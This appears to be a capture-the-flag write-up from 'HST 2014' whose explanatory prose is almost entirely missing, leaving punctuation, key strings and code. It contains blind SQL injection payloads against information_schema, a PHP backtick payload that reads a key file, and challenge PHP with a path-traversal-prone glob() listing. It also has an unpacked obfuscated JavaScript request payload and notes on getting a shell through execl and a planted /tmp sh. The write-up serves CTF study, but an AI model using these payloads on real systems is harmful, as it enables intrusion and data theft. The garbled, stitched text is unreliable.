HST 2014
HST 2014
S1_Hello_kiki: 100
hello_kiki.pcap .
RTP , -> VoIP Calls
, .
S2_qu3st2: 150
IDA .
base64 decode .
KEY IS A TCAN
md5(TCAN)
Key) 2ceb9b1a93b1b4ea9a57a117ddc3acfa
modify_ok.php
Blind SQL Injection .
sex=if((select substr(LPAD(bin(ascii(substr((SELECT table_name FROM information_schema.tables
WHERE table_type='base table' limit 1,1),$j,1))),8,0),$i,1)),1,2)
war_key , war_key .
war_key .
if((select substr(LPAD(bin(ascii(substr((SELECT war_key FROM war_key limit 0,1),$j,1))),8,0),$i,1)),1,2)
Key) President_of_HUST_is_Bother_Me
c NULL 21 xor .
S7_W T F: 350
a~z, A ~ Z input 'i' .
stringX gqSQUMGsmIeuiE .
0,1,2,3...,"Y",...)#
(is_admin "Y" ) , ,
<?=`cat ThisisKeyFile.php`?> .
<?php
/* Challenge source as quoted in the write-up. "[****]" and "[R**]" are
   redactions in the listing itself (two config values, one string suffix and
   a function name), so the script is not runnable as printed. */
/* --- */
$ip = "[****]";
$key = "[****]";
/*It's my door trick*/
/* Unquoted index: `a` is a bare constant here. Older PHP falls back to the
   string 'a' with a notice/warning; PHP 8 raises an Error. */
$a=$_GET[a];
/* $b keeps the original request value (string or array) for the check below. */
$b=$a;
/* When the parameter arrives as an array, its elements are concatenated with
   no separator and $x becomes everything after the first strlen($key) bytes.
   $x is only assigned on this path. */
if(is_array($a)){
$a= implode($a);
$x= substr($a,strlen($key));
}
/* Prefix check against the secret with loose `==`. NOTE(review): `==` applies
   PHP type juggling when both operands look numeric; $key is redacted, so
   whether that matters here cannot be told from the listing. A secret
   comparison should use `===` or hash_equals(). */
if($key==substr($a,0,strlen($key))){
/* count($b) is one past the last index of a 0-based list, so this element
   exists only when the submitted array carries a key at that position.
   NOTE(review): if `a` was sent as a plain string, count() on it is not
   meaningful (warning in PHP 7.2+, TypeError in PHP 8). */
if(is_numeric(($b[count($b)]))){
$y = $ip."[****]";
$xx = $key.$x;
/* Redacted two-argument function applied to ($key . request remainder,
   $ip . redacted suffix); what it computes is not shown. */
$r_key = [R**]($xx, $y);
}
}
/* Runs whether or not the branch above assigned $r_key. The result is
   base64-encoded and every '+' is rewritten to '||'. */
$r_key=(base64_encode($r_key));
$r_key=str_replace('+','||',$r_key);
/* ---- */
/* The request parameter is appended to the web-root path and handed to glob()
   unchanged, and the matches are printed. Nothing strips wildcards or "../"
   segments, so the listing is not confined to /var/www/html. A fixed
   allow-list, or a realpath() prefix check on each match, would confine it. */
if($_GET[glob_dir]){
print_r(glob("/var/www/html/".$_GET[glob_dir]));
}
?>
// Packed script in the eval(function(p,a,c,k,e,r){...}) form (Dean Edwards
// "packer" style): the wrapper rebuilds source text from the payload string
// and the '|'-separated dictionary, then hands that text to eval().
// The dictionary here contains 'eval', 'function', 'parseInt' and
// 'fromCharCode', and the payload starts with another (p,a,N,k,e,r) wrapper,
// so this looks like two packing layers.
// For analysis, print the wrapper's return value instead of letting eval() run
// it, and do so in an isolated environment.
// NOTE(review): this copy is line-wrapped mid-token and the payload lines
// appear reordered by text extraction, so it will not run as printed.
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharC
ode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return
r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new
RegExp('\\b'+e(c)+'\\b','g'),k[c]);return
p}('T(K(p,a,N,k,e,r){e=K(c){L(c<a?\'\':e(U(c/a)))+((c=c%a)>V?O.W(c+X):c.Y(Z))};M(!\'\'.P(/^/,O)){Q(c-)r[e(c)]=k[c]||e(c);k=[K(e){L
r[e]}];e=K(){L\'\\\\w+\'};c=1};Q(c--)M(k[c])p=p.P(R
10(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);L
3();2(8.3){c=1
p}(\'0="";0+="i";j="k";l=4;m
3();2(c.9){c.9(\\\'o/p\\\')}}q
5("s.6")}f(e){}}}2(!c){t(\\\'u
:(
2(8.5){d{c=1
y
z\\\');g
7(a,b){n
c=1
5("r.6")}f(e){d{c=1
A}c.B("C",a,h);c.D(E);g
h}0+="F";0+="G";0+="H";7("a.I?a="+J);\',S,S,\'11|R|M|12||13|14|15|16|17||||18||19|L|1a|1b|N|1c|1d|K|1
e|1f|1g|1h|1i|1j|1k|1l|1m|1n|1o|1p|1q|1r|1s|1t|1u|1v|1w|1x|1y|1z|1A\'.1B(\'|\'),0,{}))',62,100,'||||||||||||||||||||
||||||||||||||||||||||||||function|return|if|Cstar|String|replace|while|new|46|eval|parseInt|35|fromCharCode|29|t
oString|36|RegExp|key|XMLHttpRequest|ActiveXObject|XMLHTTP|makeRequest|window|overrideMim
eType|try|catch|true|0xde|alone|rc|var|text|xml|else|Msxml2|Microsoft|alert|Giving|up|Cannot|create|a
n|instance|false|open|GET|send|null|ad|be|ef|php|sc|split'.split('|'),0,{}))
// Second packing layer, same eval(function(p,a,c,k,e,r){...}) wrapper with a
// 46-entry dictionary ('key', 'XMLHttpRequest', 'makeRequest', ...).
// The wrapper's third parameter is printed as `Cstar`, while its body still
// counts down and indexes with `c` (while(c--), k[c]). As printed the unpacker
// therefore refers to a name it never receives; presumably the outer layer's
// dictionary substituted `Cstar` for that token. Restoring the parameter name
// to `c` is needed before the payload can be recovered.
// As with the first layer, print the returned string rather than eval() it.
eval(function(p,a,Cstar,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCh
arCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return
r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new
RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0="";0+="i";j="k";l=4;m 7(a,b){n c=1 3();2(8.3){c=1
3();2(c.9){c.9(\'o/p\')}}q 2(8.5){d{c=1 5("r.6")}f(e){d{c=1 5("s.6")}f(e){}}}2(!c){t(\'u v :( w x y 6 z\');g
A}c.B("C",a,h);c.D(E);g
h}0+="F";0+="G";0+="H";7("a.I?a="+J);',46,46,'key|new|if|XMLHttpRequest||ActiveXObject|XMLHTTP|
makeRequest|window|overrideMimeType||||try||catch|return|true|0xde|Cstar|alone|rc|function|var|text|
xml|else|Msxml2|Microsoft|alert|Giving|up|Cannot|create|an|instance|false|open|GET|send|null|ad|be|e
f|php|sc'.split('|'),0,{}))
, function Cstar c .
// Unpacked payload, first statements. All three names are assigned without a
// declaration, so they become globals in sloppy mode.
// `key` is assembled piecewise: it starts as "0xde" here and three more
// fragments are appended after makeRequest is defined.
key = "";
key += "0xde";
// Cstar and rc are set but not read anywhere in this listing.
Cstar = "alone";
rc = 4;
/**
 * Send an asynchronous GET request to `a` and ignore whatever comes back.
 *
 * No response handler is attached, so the request is fire-and-forget.
 * The transport is XMLHttpRequest when `window` exposes it, otherwise the
 * legacy ActiveX XMLHTTP objects are tried in turn.
 *
 * @param {string} a - URL to request.
 * @param {*} b - Accepted but never used.
 * @returns {boolean} true once the request has been sent, false if no
 *   transport object is available.
 */
function makeRequest(a, b) {
  // Created unconditionally, before the feature checks below.
  let transport = new XMLHttpRequest();

  if (window.XMLHttpRequest) {
    transport = new XMLHttpRequest();
    if (transport.overrideMimeType) {
      transport.overrideMimeType('text/xml');
    }
  } else if (window.ActiveXObject) {
    // Legacy fallback: first ProgID that can be instantiated wins; failures
    // are swallowed and leave the earlier object in place.
    const progIds = ["Msxml2.XMLHTTP", "Microsoft.XMLHTTP"];
    for (const progId of progIds) {
      try {
        transport = new ActiveXObject(progId);
        break;
      } catch (e) {}
    }
  }

  if (!transport) {
    alert('Giving up :( Cannot create an XMLHTTP instance');
    return false;
  }

  transport.open("GET", a, true);
  transport.send(null);
  return true;
}
// Remaining fragments: with the "0xde" assigned earlier, `key` now reads
// "0xdeadbeef".
key += "ad";
key += "be";
key += "ef";
// The request carries `sc`, not `key`. `sc` is never assigned in this listing,
// so as written this line throws a ReferenceError before any request is made.
makeRequest("a.php?a=" + sc);
./bin -h a -d xxxxxx... (h )
/home/k1r.. PC
.
printf pc .
, execl printf
null , execl /bin/sh] \n .
/bin /tmp , tmp sh] \n .
Boss.smali